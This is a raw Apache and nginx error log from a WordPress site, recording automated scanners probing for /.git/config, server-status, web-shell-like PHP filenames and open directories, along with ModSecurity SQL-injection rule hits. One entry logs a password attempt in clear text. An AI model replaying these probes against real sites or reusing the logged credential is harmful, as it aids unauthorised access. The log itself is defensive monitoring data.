(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:23.357016 2025] [autoindex:error] [pid 11230:tid 140634081888000] [client 38.252.239.77:33190] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:30.520542 2025] [autoindex:error] [pid 11230:tid 140634258134784] [client 38.252.239.77:33226] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:36.973220 2025] [autoindex:error] [pid 11230:tid 140634149029632] [client 38.252.239.77:33248] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:43.719544 2025] [autoindex:error] [pid 11230:tid 140634098673408] [client 38.252.239.77:33272] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:53.930996 2025] [autoindex:error] [pid 11230:tid 140634249742080] [client 38.252.239.77:33322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:02:59.689156 2025] [autoindex:error] [pid 10662:tid 140634224563968] [client 38.252.239.77:33348] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 12:03:08.488901 2025] [autoindex:error] [pid 11230:tid 140634354153216] [client 38.252.239.77:33374] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 14:34:36.273956 2025] [autoindex:error] [pid 11230:tid 140634216171264] [client 159.89.172.52:48830] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Feb 18 02:49:38.706706 2025] [authz_core:error] [pid 10663:tid 140634354153216] [client 159.203.96.42:55942] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/18 02:49:41 [error] 10627#10627: *478408 access forbidden by rule, client: 159.203.96.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Feb 18 08:42:01.100199 2025] [authz_core:error] [pid 19985:tid 140325263714048] [client 159.203.96.42:54256] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/18 08:42:05 [error] 19946#19946: *478996 access forbidden by rule, client: 159.203.96.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 18 22:15:06.759170 2025] [:error] [pid 7853:tid 140417469183744] [client 150.136.222.122:35654] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 18 22:15:22.130957 2025] [:error] [pid 7548:tid 140417469183744] [client 150.136.222.122:35722] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:15:22.150456 2025] [:error] [pid 7548:tid 140417311930112] [client 150.136.222.122:35724] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:16:11.519277 2025] [autoindex:error] [pid 7546:tid 140417502754560] [client 150.136.222.122:35946] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:16:21.594646 2025] [:error] [pid 7546:tid 140417337108224] [client 150.136.222.122:35990] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:16:22.579458 2025] [autoindex:error] [pid 7548:tid 140417337108224] [client 150.136.222.122:35996] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:16:23.599376 2025] [autoindex:error] [pid 7853:tid 140417320322816] [client 150.136.222.122:36002] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:16:29.610545 2025] [:error] [pid 12825:tid 140417469183744] [client 150.136.222.122:36030] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Feb 18 22:16:29.620272 2025] [:error] [pid 7853:tid 140417278359296] [client 150.136.222.122:36032] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Feb 18 22:17:23.245703 2025] [:error] [pid 12825:tid 140417228003072] [client 150.136.222.122:36278] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 18 22:17:38.457219 2025] [:error] [pid 7853:tid 140417320322816] [client 150.136.222.122:36356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:17:38.486456 2025] [:error] [pid 12825:tid 140417286752000] [client 150.136.222.122:36358] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:18:22.822873 2025] [autoindex:error] [pid 12825:tid 140417228003072] [client 150.136.222.122:36578] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:18:32.666180 2025] [:error] [pid 7853:tid 140417353893632] [client 150.136.222.122:36624] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 18 22:18:33.589208 2025] [autoindex:error] [pid 12825:tid 140417320322816] [client 150.136.222.122:36630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:18:34.535226 2025] [autoindex:error] [pid 7546:tid 140417337108224] [client 150.136.222.122:36636] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 18 22:18:40.227369 2025] [:error] [pid 7853:tid 140417345500928] [client 150.136.222.122:36664] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Feb 18 22:18:40.251813 2025] [:error] [pid 7546:tid 140417379071744] [client 150.136.222.122:36666] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Feb 19 02:21:37.413552 2025] [autoindex:error] [pid 12825:tid 140417502754560] [client 64.227.154.83:47466] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/02/19 09:05:42 [error] 13344#13344: *536831 access forbidden by rule, client: 57.180.240.215, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/19 10:07:23 [error] 13345#13345: *537366 access forbidden by rule, client: 57.180.240.215, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Feb 19 10:22:11.915513 2025] [:error] [pid 13944:tid 139974561216256] [client 103.80.249.184:45638] [client 103.80.249.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z7X3I7y5W8G9gNcfRL3gXgAAAMk"] 2025/02/19 13:17:12 [error] 13344#13344: *539427 access forbidden by rule, client: 57.180.240.215, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/19 13:48:03 [error] 13344#13344: *539629 access forbidden by rule, client: 57.180.240.215, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/19 15:19:48 [error] 13345#13345: *540830 access forbidden by rule, client: 57.180.240.215, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Feb 19 23:32:32.700925 2025] [:error] [pid 13944:tid 139974544430848] [client 57.128.47.31:33518] [client 57.128.47.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@123! found within ARGS:pwd: Investigacionperu@@123!"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z7awYLy5W8G9gNcfRL3mwAAAAMs"] [Thu Feb 20 06:30:57.090220 2025] [authz_core:error] [pid 21126:tid 139766221698816] [client 146.190.63.248:46656] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/20 06:31:01 [error] 21090#21090: *555326 access forbidden by rule, client: 146.190.63.248, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Feb 20 08:22:58.902369 2025] [authz_core:error] [pid 30864:tid 139766188128000] [client 68.183.9.16:34282] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/20 08:23:04 [error] 30780#30780: *557009 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Feb 21 12:26:44.818759 2025] [autoindex:error] [pid 10618:tid 140590150825728] [client 68.183.85.34:52766] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/02/21 14:57:47 [error] 9976#9976: *578030 access forbidden by rule, client: 52.66.240.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Feb 21 18:42:18.473759 2025] [autoindex:error] [pid 10018:tid 140590050113280] [client 64.227.163.45:39346] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 21 23:05:53.874800 2025] [:error] [pid 12740:tid 140590066898688] [client 157.66.54.6:43498] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-conflg.php 2025/02/22 03:14:05 [error] 9977#9977: *587483 access forbidden by rule, client: 52.66.240.57, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Feb 22 03:23:44.678501 2025] [authz_core:error] [pid 22421:tid 139876011833088] [client 46.101.1.225:49586] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/22 03:23:48 [error] 21757#21757: *587592 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Feb 22 04:24:39.490185 2025] [autoindex:error] [pid 21794:tid 139876179207936] [client 157.66.54.6:50946] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/02/22 04:48:27 [error] 21758#21758: *588558 access forbidden by rule, client: 52.66.240.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/22 05:45:09 [error] 21758#21758: *589095 access forbidden by rule, client: 52.66.240.57, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Feb 22 08:58:55.918703 2025] [authz_core:error] [pid 21793:tid 139876045403904] [client 165.22.34.189:54938] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/22 08:58:58 [error] 21757#21757: *590946 access forbidden by rule, client: 165.22.34.189, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/22 09:56:24 [error] 21757#21757: *591311 access forbidden by rule, client: 52.66.240.57, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/22 13:57:22 [error] 21757#21757: *593418 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Feb 22 20:02:25.521302 2025] [autoindex:error] [pid 5805:tid 139876187600640] [client 64.227.163.45:37188] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 23 04:48:13.558405 2025] [:error] [pid 8762:tid 140317714016000] [client 150.136.222.122:48950] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Feb 23 04:48:24.366757 2025] [:error] [pid 9592:tid 140317537769216] [client 150.136.222.122:48990] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:48:24.375881 2025] [:error] [pid 8764:tid 140317722408704] [client 150.136.222.122:48992] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:48:52.755169 2025] [autoindex:error] [pid 9592:tid 140317562947328] [client 150.136.222.122:49098] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:48:59.711412 2025] [:error] [pid 8763:tid 140317604910848] [client 150.136.222.122:49128] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:49:00.396407 2025] [autoindex:error] [pid 9592:tid 140317680445184] [client 150.136.222.122:49132] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:49:01.048507 2025] [autoindex:error] [pid 8763:tid 140317803570944] [client 150.136.222.122:49136] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:49:05.410835 2025] [:error] [pid 8762:tid 140317680445184] [client 150.136.222.122:49154] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 23 04:49:05.422397 2025] [:error] [pid 9592:tid 140317596518144] [client 150.136.222.122:49156] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 23 04:49:42.240516 2025] [:error] [pid 8764:tid 140317588125440] [client 150.136.222.122:49298] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Feb 23 04:49:53.426235 2025] [:error] [pid 8764:tid 140317554554624] [client 150.136.222.122:49352] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:49:53.436134 2025] [:error] [pid 8762:tid 140317571340032] [client 150.136.222.122:49354] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:50:25.562350 2025] [autoindex:error] [pid 8763:tid 140317803570944] [client 150.136.222.122:49466] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:50:32.490958 2025] [:error] [pid 8764:tid 140317688837888] [client 150.136.222.122:49490] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Feb 23 04:50:33.117492 2025] [autoindex:error] [pid 8764:tid 140317537769216] [client 150.136.222.122:49494] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:50:33.690890 2025] [autoindex:error] [pid 8762:tid 140317562947328] [client 150.136.222.122:49498] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 04:50:37.812885 2025] [:error] [pid 8764:tid 140317811963648] [client 150.136.222.122:49514] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 23 04:50:37.832696 2025] [:error] [pid 8762:tid 140317638481664] [client 150.136.222.122:49516] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Feb 23 09:16:13.687767 2025] [autoindex:error] [pid 8764:tid 140317604910848] [client 167.86.125.151:59312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 11:59:52.639178 2025] [autoindex:error] [pid 9592:tid 140317613303552] [client 64.227.163.45:33626] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 23 18:43:19.106451 2025] [autoindex:error] [pid 30518:tid 140317697230592] [client 104.194.147.82:38956] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:43:47.731210 2025] [autoindex:error] [pid 8764:tid 140317672052480] [client 104.194.147.82:38960] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:44:19.908444 2025] [autoindex:error] [pid 8763:tid 140317613303552] [client 104.194.147.82:38976] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:44:32.024933 2025] [autoindex:error] [pid 8762:tid 140317596518144] [client 104.194.147.82:38980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:44:42.757231 2025] [autoindex:error] [pid 8762:tid 140317562947328] [client 104.194.147.82:38984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:44:54.094081 2025] [autoindex:error] [pid 8762:tid 140317688837888] [client 104.194.147.82:38992] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:45:07.979767 2025] [autoindex:error] [pid 8762:tid 140317588125440] [client 104.194.147.82:38998] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 23 18:45:21.395834 2025] [autoindex:error] [pid 30435:tid 140317546161920] [client 104.194.147.82:39002] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 24 04:08:29.378061 2025] [autoindex:error] [pid 27929:tid 140472114693888] [client 64.227.163.45:46914] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 